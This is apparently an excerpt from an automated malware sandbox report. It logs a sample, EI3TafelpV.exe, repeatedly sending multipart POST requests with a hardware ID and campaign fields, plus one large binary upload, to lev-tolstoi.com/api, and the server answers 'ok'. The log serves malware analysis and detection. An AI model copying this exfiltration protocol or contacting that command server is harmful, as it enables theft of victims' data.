                                                                                                                                                                                                                                                                                      2024-12-23 05:54:24 UTC1369INData Raw: 32 63 37 34 0d 0a 6c 49 52 34 7a 45 69 65 59 62 31 2f 32 65 79 4f 53 33 67 45 6f 4d 56 32 42 59 6f 31 63 2f 4e 65 54 57 39 30 75 4b 33 50 41 6a 44 57 7a 53 2f 52 53 49 68 68 2f 44 79 54 72 63 59 49 61 68 61 6e 6f 78 68 77 79 32 30 6d 73 78 38 68 54 6a 32 37 34 4e 39 56 65 63 69 57 62 4d 30 47 31 7a 66 37 63 63 47 77 67 46 4e 46 56 61 6a 64 47 52 6d 52 65 47 44 38 54 69 70 7a 4e 4b 2f 71 7a 31 4d 6c 6f 35 6c 69 78 52 2f 42 59 66 56 2f 68 2f 2b 59 57 7a 4a 56 35 49 78 6d 44 34 45 79 65 2f 46 64 53 43 42 6f 76 71 50 41 41 6e 37 45 32 7a 32 4e 53 4d 4a 68 34 33 2f 47 76 4e 49 5a 65 68 62 32 6e 6d 46 70 37 30 34 6e 6f 67 73 59 59 48 69 50 35 73 31 46 4b 4d 72 44 59 49 4e 51 36 57 48 7a 66 37 37 78 67 42 4d 38 54 61 43 6f 4a 56 6e 66 5a 7a 61 31 51 7a 46 33 50
                                                                                                                                                                                                                                                                                      Data Ascii: 2c74lIR4zEieYb1/2eyOS3gEoMV2BYo1c/NeTW90uK3PAjDWzS/RSIhh/DyTrcYIahanoxhwy20msx8hTj274N9VeciWbM0G1zf7ccGwgFNFVajdGRmReGD8TipzNK/qz1Mlo5lixR/BYfV/h/+YWzJV5IxmD4Eye/FdSCBovqPAAn7E2z2NSMJh43/GvNIZehb2nmFp704nogsYYHiP5s1FKMrDYINQ6WHzf77xgBM8TaCoJVnfZza1QzF3P
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:24 UTC1369INData Raw: 62 4b 4a 4c 44 4e 35 46 47 6b 44 50 37 5a 38 48 34 77 78 6c 75 45 2b 4f 4c 4a 52 44 76 58 67 65 71 43 52 35 6d 4b 72 62 69 6c 6d 78 65 70 62 31 52 31 67 76 65 4c 37 77 70 6b 50 2b 4f 53 33 4e 56 75 4b 52 6d 48 35 46 66 62 75 51 57 58 79 68 36 6c 4f 37 58 54 47 2b 53 6b 69 4c 6b 42 74 63 67 72 53 2b 57 73 49 38 6c 53 6a 53 67 30 32 5a 52 6b 54 68 79 36 6b 34 62 59 58 72 35 76 59 73 5a 50 64 66 55 50 35 45 58 6e 6a 6a 37 4b 63 48 6e 6b 6b 55 38 42 36 44 46 5a 68 44 53 63 6a 4b 69 44 51 6c 7a 66 5a 2f 54 2f 6b 78 76 68 5a 56 2f 7a 67 54 78 49 71 6f 31 76 34 48 56 43 48 49 62 35 34 73 33 46 35 38 67 4c 2b 52 57 4a 6a 42 79 34 64 4b 58 41 6e 44 45 32 79 2f 32 43 39 34 76 76 43 6d 51 38 75 63 46 65 78 54 32 6a 53 74 62 38 47 4d 78 72 6b 35 52 4d 44 7a 68 74 59
                                                                                                                                                                                                                                                                                      Data Ascii: bKJLDN5FGkDP7Z8H4wxluE+OLJRDvXgeqCR5mKrbilmxepb1R1gveL7wpkP+OS3NVuKRmH5FfbuQWXyh6lO7XTG+SkiLkBtcgrS+WsI8lSjSg02ZRkThy6k4bYXr5vYsZPdfUP5EXnjj7KcHnkkU8B6DFZhDScjKiDQlzfZ/T/kxvhZV/zgTxIqo1v4HVCHIb54s3F58gL+RWJjBy4dKXAnDE2y/2C94vvCmQ8ucFexT2jStb8GMxrk5RMDzhtY


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      3192.168.2.949710172.67.157.2544437524C:\Users\user\Desktop\EI3TafelpV.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:25 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=7PRN6VEDR5TMHUPTENR
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Content-Length: 12857
                                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:25 UTC12857OUTData Raw: 2d 2d 37 50 52 4e 36 56 45 44 52 35 54 4d 48 55 50 54 45 4e 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 38 36 31 42 32 36 42 30 46 43 38 46 32 44 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 37 50 52 4e 36 56 45 44 52 35 54 4d 48 55 50 54 45 4e 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 50 52 4e 36 56 45 44 52 35 54 4d 48 55 50 54 45 4e 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
                                                                                                                                                                                                                                                                                      Data Ascii: --7PRN6VEDR5TMHUPTENRContent-Disposition: form-data; name="hwid"F9861B26B0FC8F2DAC8923850305D13E--7PRN6VEDR5TMHUPTENRContent-Disposition: form-data; name="pid"2--7PRN6VEDR5TMHUPTENRContent-Disposition: form-data; name="lid"LOGS11--Li
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:26 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 05:54:26 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=82m4uk9emb5rnc1aqffhg8gnon; expires=Thu, 17 Apr 2025 23:41:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oSMiGkIwJvU5b7h6cfMSeDciEsA9mmBlyI0JxFkuB6Vky59%2FoB8neLL%2FxYy7UF5AiunTdMEB%2BCfmUHCRIQpVoWe8bwtpbD5yN66SxOmWKWnfzzZPQQTZwkRIq0LyhFMkecU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8f6618d12a5ff791-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1502&min_rtt=1500&rtt_var=568&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13797&delivery_rate=1917268&cwnd=135&unsent_bytes=0&cid=5fc5ffbf948291e2&ts=965&x=0"
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      4192.168.2.949711172.67.157.2544437524C:\Users\user\Desktop\EI3TafelpV.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:28 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=WTAXVV5OA9AVBM
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Content-Length: 15045
                                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:28 UTC15045OUTData Raw: 2d 2d 57 54 41 58 56 56 35 4f 41 39 41 56 42 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 38 36 31 42 32 36 42 30 46 43 38 46 32 44 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 57 54 41 58 56 56 35 4f 41 39 41 56 42 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 54 41 58 56 56 35 4f 41 39 41 56 42 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 57 54
                                                                                                                                                                                                                                                                                      Data Ascii: --WTAXVV5OA9AVBMContent-Disposition: form-data; name="hwid"F9861B26B0FC8F2DAC8923850305D13E--WTAXVV5OA9AVBMContent-Disposition: form-data; name="pid"2--WTAXVV5OA9AVBMContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--WT
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:29 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 05:54:28 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=f4l75ch6mci0m62pib49ghn88c; expires=Thu, 17 Apr 2025 23:41:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VfmPxzCRbvReX2hOKlOpVLGKrn7TMTo8WJLYMH6trPO6yEDn0eOsjcZBsePnhm9Vmd03rlTEhyLS0eUYObaKDRHlo8lRCxM0hdFijlJA3eDU9BcH%2FHSYK68EbJDBLQrLysE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8f6618df3c6f43cb-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1782&min_rtt=1777&rtt_var=678&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2836&recv_bytes=15980&delivery_rate=1601755&cwnd=198&unsent_bytes=0&cid=9e8d9db61c3b8a5a&ts=851&x=0"
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:29 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      5192.168.2.949712172.67.157.2544437524C:\Users\user\Desktop\EI3TafelpV.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:30 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=75TOG7M26NB660J
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Content-Length: 20567
                                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:30 UTC15331OUTData Raw: 2d 2d 37 35 54 4f 47 37 4d 32 36 4e 42 36 36 30 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 38 36 31 42 32 36 42 30 46 43 38 46 32 44 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 37 35 54 4f 47 37 4d 32 36 4e 42 36 36 30 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 37 35 54 4f 47 37 4d 32 36 4e 42 36 36 30 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                                                                                                                                                                                                                      Data Ascii: --75TOG7M26NB660JContent-Disposition: form-data; name="hwid"F9861B26B0FC8F2DAC8923850305D13E--75TOG7M26NB660JContent-Disposition: form-data; name="pid"3--75TOG7M26NB660JContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:30 UTC5236OUTData Raw: a5 91 90 6c b4 51 98 a9 b7 4a 24 6e 49 6e c9 56 ca e5 5a 2b a1 3f 3a 9e b9 75 bf a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 7d 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 3f 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce f5 45 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 fe 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 17 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: lQJ$nInVZ+?:us}Q0u?4E([:s~
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:31 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 05:54:31 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=h10cce2odo3gg02b9njtrd1gbn; expires=Thu, 17 Apr 2025 23:41:10 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iEixJCmlF8Y41XJahK92fHTSatbYUHuk6cyoghk15Lz7LJdyO%2BSpJUVfKS3EJLXOd6r%2BfML9Rpp9ZZtBt8aUBUoKzUU7MtAv9OtqolCzEuLFhgUZSuQjgDq0%2BkHKR7e7uFQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8f6618efbf13c46d-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1516&min_rtt=1515&rtt_var=571&sent=16&recv=27&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21525&delivery_rate=1912246&cwnd=248&unsent_bytes=0&cid=957c54e60c42ab07&ts=957&x=0"
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:31 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      6192.168.2.949715172.67.157.2544437524C:\Users\user\Desktop\EI3TafelpV.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:33 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=MJKDGYDQZY9N5ZTZ0JE
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Content-Length: 1247
                                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:33 UTC1247OUTData Raw: 2d 2d 4d 4a 4b 44 47 59 44 51 5a 59 39 4e 35 5a 54 5a 30 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 38 36 31 42 32 36 42 30 46 43 38 46 32 44 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4d 4a 4b 44 47 59 44 51 5a 59 39 4e 35 5a 54 5a 30 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4d 4a 4b 44 47 59 44 51 5a 59 39 4e 35 5a 54 5a 30 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
                                                                                                                                                                                                                                                                                      Data Ascii: --MJKDGYDQZY9N5ZTZ0JEContent-Disposition: form-data; name="hwid"F9861B26B0FC8F2DAC8923850305D13E--MJKDGYDQZY9N5ZTZ0JEContent-Disposition: form-data; name="pid"1--MJKDGYDQZY9N5ZTZ0JEContent-Disposition: form-data; name="lid"LOGS11--Li
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:34 UTC1120INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 05:54:34 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=55t6ci86afhhhetkqmao59ftbk; expires=Thu, 17 Apr 2025 23:41:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v2fqOZB50HzOZ0kagoncUnL3H6x70sWfIdmMSCnSJHuS2Rrox7heRTPeumEOlaOwpl1vbj0scTFwaJS8jrPf0BLpURvpalDC9L398%2Brhu57mA6IANUweXm7GPQRqmXFHTKw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8f6619022e8c7286-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1998&min_rtt=1988&rtt_var=766&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2164&delivery_rate=1410628&cwnd=241&unsent_bytes=0&cid=aed5d06b2dea908c&ts=782&x=0"
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:34 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      7192.168.2.949716172.67.157.2544437524C:\Users\user\Desktop\EI3TafelpV.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:36 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=0ENUQ248FOVKBF0B063
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Content-Length: 587454
                                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:36 UTC15331OUTData Raw: 2d 2d 30 45 4e 55 51 32 34 38 46 4f 56 4b 42 46 30 42 30 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 38 36 31 42 32 36 42 30 46 43 38 46 32 44 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 30 45 4e 55 51 32 34 38 46 4f 56 4b 42 46 30 42 30 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 45 4e 55 51 32 34 38 46 4f 56 4b 42 46 30 42 30 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
                                                                                                                                                                                                                                                                                      Data Ascii: --0ENUQ248FOVKBF0B063Content-Disposition: form-data; name="hwid"F9861B26B0FC8F2DAC8923850305D13E--0ENUQ248FOVKBF0B063Content-Disposition: form-data; name="pid"1--0ENUQ248FOVKBF0B063Content-Disposition: form-data; name="lid"LOGS11--Li
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:36 UTC15331OUTData Raw: 01 d0 ed 16 51 fa b1 84 39 93 f4 58 d5 3e b9 ac 03 d6 2d d3 bf 42 7d 93 ca ba 45 d2 9b b4 69 9a 9a d0 d8 8e 7c 77 b4 d8 c2 15 b3 f6 a7 d4 90 cb 81 b2 06 2f 9a 4e 07 08 4e a5 c3 88 4d ed af 4f 61 fb f1 aa 56 58 1d c1 13 48 39 0b d1 39 a1 59 19 0a 18 9e ec 0a f9 96 18 1c e6 fc ad 3b 59 7b 26 32 38 5a 14 dc ff 5d 56 d3 6c 66 ef 07 43 50 79 6b f8 85 bd a5 4a ac c9 d5 13 65 85 36 a5 ad e7 6d de 3f e7 54 8c 2a d0 2c 24 00 09 8e 4c 38 9d 5c 66 e9 3a 67 35 35 1c 84 e8 c2 56 ff bb bf e4 7f 0f bd 58 18 19 8e a1 28 00 0a 0f e2 4e 1d e7 57 bc 80 35 a2 43 7e 5e cd 82 13 0b b1 b5 2d 4f ca d1 9c 66 4e 29 bb 11 8a d7 6a 8a a6 7a 7e 4b 16 a6 17 09 f7 4e ba f5 cd 42 34 b9 dc da 74 4b d1 9f 2d 37 45 0b 21 ac 1f a9 bb 85 ea c9 63 3d 1c a1 ea 46 79 f7 9e bf 12 a9 8e 49 17 a6
                                                                                                                                                                                                                                                                                      Data Ascii: Q9X>-B}Ei|w/NNMOaVXH99Y;Y{&28Z]VlfCPykJe6m?T*,$L8\f:g55VX(NW5C~^-OfN)jz~KNB4tK-7E!c=FyI
